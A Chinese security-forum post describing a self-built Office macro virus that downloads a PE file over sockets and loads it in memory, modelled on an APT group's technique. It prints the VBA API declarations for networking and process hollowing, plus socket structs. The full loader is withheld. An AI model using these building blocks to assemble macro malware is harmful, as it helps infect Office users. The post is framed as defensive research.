一个远程下载并内存加载PE的office宏病毒-编程技术-看雪-安全社区|安全招聘|kanxue.com

一个远程下载并内存加载PE的office宏病毒

发表于: 2021-5-23 17:45 10848

一个远程下载并内存加载PE的office宏病毒

某警官

2021-5-23 17:45

10848

1.引言

这份代码写于2019年初，当时一个名为海莲花的apt组织使用office宏加载shellcode，用shellcode内存加载病毒，并使用白加黑的方式加载恶意dll,在看着分析报告完整的复现了他的攻击手法后，我想再多做一些尝试。他的代码中shellcode与PE文件都是从本地解密得到的，我在此基础上增加了网络下载PE文件到内存，直接用office宏内存加载PE，并兼容了32位和64位系统。
鉴于论坛坛主说此类项目不宜直接分享源代码，这里只讲一下下载部分的函数与结构体定义，感兴趣的朋友可以根据本贴自己实现。项目旨在研究office恶意宏的更多可行性，以便蓝队更好的做防御，切勿用于非法用途。

2.需求分析与初步设计

  2.1 网络下载
  使用宏调用ws2_32.dll的导出函数
  2.2 内存加载
  使用宏调用kernel32.dll的导出函数
  2.3 兼容32位与64位
  需要对所有函数与结构体做两份声明与定义

3.部分实现

首先需要对所需的函数进行声明，对结构体进行定义，我在这里花费了很长时间，对所有函数的声明如下，其中包含了32位与64位：

#If Win64 Then

    Public Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long

    Public Declare PtrSafe Function connect Lib "ws2_32.dll" (ByVal socket As LongLong, ByVal SOCKADDR As LongLong, ByVal namelen As Long) As Long

    Public Declare PtrSafe Sub WSACleanup Lib "ws2_32.dll" ()

    Private Declare PtrSafe Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As LongLong, lpResult As LongLong) As Long

    Public Declare PtrSafe Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal AF As Long, ByVal stype As Long, ByVal Protocol As Long) As Long

    Public Declare PtrSafe Function closesocket Lib "ws2_32.dll" (ByVal socket As Long) As Long

    Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)

    Public Declare PtrSafe Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long

    Public Declare PtrSafe Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long

    Public Declare PtrSafe Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long

    Private Declare PtrSafe Function WSAGetLastError Lib "ws2_32.dll" () As Long
 
    Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)

    Private Declare PtrSafe Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long

    Private Declare PtrSafe Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long

    Private Declare PtrSafe Function GetThreadContext Lib "kernel32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long

    Private Declare PtrSafe Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long

    Private Declare PtrSafe Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr

    Private Declare PtrSafe Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long

    Private Declare PtrSafe Function SetThreadContext Lib "kernel32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long

    Private Declare PtrSafe Function ResumeThread Lib "kernel32" (ByVal hThread As LongPtr) As Long

    Private Declare PtrSafe Function TerminateProcess Lib "kernel32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
 
    Public Declare PtrSafe Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal handleProcess As LongPtr, ByVal imageAddress As LongPtr) As Long

    Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#Else

    Public Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long

    Public Declare Function connect Lib "ws2_32.dll" (ByVal socket As Long, ByVal SOCKADDR As Long, ByVal namelen As Long) As Long

    Public Declare Sub WSACleanup Lib "ws2_32.dll" ()

    Private Declare Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As Long, lpResult As Long) As Long

    Public Declare Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal AF As Long, ByVal stype As Long, ByVal Protocol As Long) As Long

    Public Declare Function closesocket Lib "ws2_32.dll" (ByVal socket As Long) As Long

    Private Declare Function CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) As Long

    Public Declare Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long

    Public Declare Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long

    Public Declare Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long

    Private Declare Function WSAGetLastError Lib "ws2_32.dll" () As Long

    Private Declare Function VarPtrArray Lib "VBE7" Alias "VarPtr" (var() As Any) As Long

    Private Declare Sub RtlMoveMemory Lib "kernel32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long)

    Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long

    Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long

    Private Declare Function GetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT) As Long

    Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long

    Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long

    Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long

    Private Declare Function SetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT) As Long

    Private Declare Function ResumeThread Lib "kernel32" (ByVal hThread As Long) As Long

    Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Integer) As Long

    Public Declare Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal handleProcess As Long, ByVal imageAddress As Long) As Long

    Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If

有了以上定义的函数，还需要定义一些结构体，其中包括socket通信需要用到的结构体与PE文件结构需要用到的结构体
socket通信结构体：

#If Win64 Then

    Private Type WSADATA

        wVersion As Integer

        wHighVersion As Integer

        szDescription(0 To WSADESCRIPTION_LEN) As Byte

        szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte

        iMaxSockets As Integer

        iMaxUdpDg As Integer

        lpVendorInfo As LongLong

    End Type

    Private Type ADDRINFO

        ai_flags As Long

        ai_family As Long

        ai_socktype As Long

        ai_protocol As Long

        ai_addrlen As Long

        ai_canonName As LongLong 'strptr

        ai_addr As LongLong 'p sockaddr

        ai_next As LongLong 'p addrinfo

    End Type
#Else

    Private Type WSADATA

        wVersion As Integer

        wHighVersion As Integer

        szDescription(0 To WSADESCRIPTION_LEN) As Byte

        szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte

        iMaxSockets As Integer

        iMaxUdpDg As Integer

        lpVendorInfo As Long

    End Type

    Private Type ADDRINFO

        ai_flags As Long

        ai_family As Long

        ai_socktype As Long

        ai_protocol As Long

        ai_addrlen As Long

        ai_canonName As Long 'strptr

        ai_addr As Long 'p sockaddr

        ai_next As Long 'p addrinfo

    End Type
#End If

登录后可查看完整内容

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

#其他

收藏・14

免费・4

支持

赞赏记录

参与人

雪币

留言

时间

PLEBFE

为你点赞~

2023-1-13 04:04

舒默哦

为你点赞~

2021-5-30 23:44

mb_othzuqqm

为你点赞~

2021-5-25 13:38

dabaisuv

为你点赞~

2021-5-24 16:29

最新回复 (2)
mJqalJqN 雪币： 16 能力值： ( LV1，RANK：0 ) 在线值：发帖 4 回帖 29 粉丝 4 关注私信	mJqalJqN 2 楼样本呢？ 2021-5-24 23:56 0
mb_othzuqqm 雪币： 346 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	mb_othzuqqm 3 楼牛批666我嘞宝贝 2021-5-25 13:38 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

某警官

发帖

回帖

RANK

关注

私信

1.引言
2.需求分析与初步设计
3.部分实现

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (2)
mJqalJqN 雪币： 16 能力值： ( LV1，RANK：0 ) 在线值：发帖 4 回帖 29 粉丝 4 关注私信	mJqalJqN 2 楼样本呢？ 2021-5-24 23:56 0
mb_othzuqqm 雪币： 346 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	mb_othzuqqm 3 楼牛批666我嘞宝贝 2021-5-25 13:38 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复